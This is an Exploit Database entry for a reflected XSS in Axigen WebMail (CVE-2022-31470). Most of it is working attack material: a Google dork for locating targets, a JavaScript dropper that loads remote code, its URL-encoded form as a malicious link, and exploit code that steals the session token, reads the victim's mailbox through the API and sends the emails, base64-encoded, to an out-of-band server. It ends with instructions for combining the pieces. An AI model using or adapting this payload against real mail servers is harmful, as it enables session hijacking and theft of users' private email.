Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

• Exploit Database
• 12 阅读

• 作者： AmirZargham
  日期： 2023-09-08
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51722/

• # Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
  # Google Dork: inurl:passwordexpired=yes
  # Date: 2023-08-21
  # Exploit Author: AmirZargham
  # Vendor Homepage: https://www.axigen.com/
  # Software Link: https://www.axigen.com/mail-server/download/
  # Version: (10.5.0–4370c946) and older version of Axigen WebMail
  # Tested on: firefox,chrome
  # CVE: CVE-2022-31470
  
  Exploit
  We use the second Reflected XSS to exploit this vulnerability, create a
  malicious link, and steal user emails.
  
  Dropper code
  This dropper code, loads and executes JavaScript exploit code from a remote
  server.
  
  ');
  x = document.createElement('script');
  x.src = 'https://example.com/exploit.js';
  window.addEventListener('DOMContentLoaded',function y(){
  document.body.appendChild(x)
  })//
  
  
  
  Encoded form
  
  /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
  https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
  
  
  Exploit code
  
  xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
  XMLHttpRequest();
  oob_server = 'https://example.com/';
  var script_tag = document.createElement('script');
  
  xhr1.open('GET', '/', true);
  xhr1.onreadystatechange = () => {
  if (xhr1.readyState === XMLHttpRequest.DONE) {
  _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
  xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
  true);
  xhr2.setRequestHeader('Content-Type', 'application/json');
  xhr2.onreadystatechange = () => {
  if (xhr2.readyState === XMLHttpRequest.DONE) {
  if (xhr2.status === 401){
  script_tag.src =
  `${oob_server}?status=session_expired&domain=${document.domain}`;
  document.body.appendChild(script_tag);
  } else {
  resp = xhr2.responseText;
  folderId = JSON.parse(resp)["mails"][0]["folderId"];
  xhr3.open('GET',
  `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
  xhr3.onreadystatechange = () => {
  if (xhr3.readyState === XMLHttpRequest.DONE) {
  emails = xhr3.responseText;
  script_tag.src =
  `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
  document.body.appendChild(script_tag);
  }
  };
  xhr3.send();
  }
  }
  };
  var body = JSON.stringify({isUnread: false});
  xhr2.send(body);
  }
  };
  xhr1.send();
  
  
  Combining dropper and exploit
  You can host the exploit code somewhere and then address it in the dropper
  code.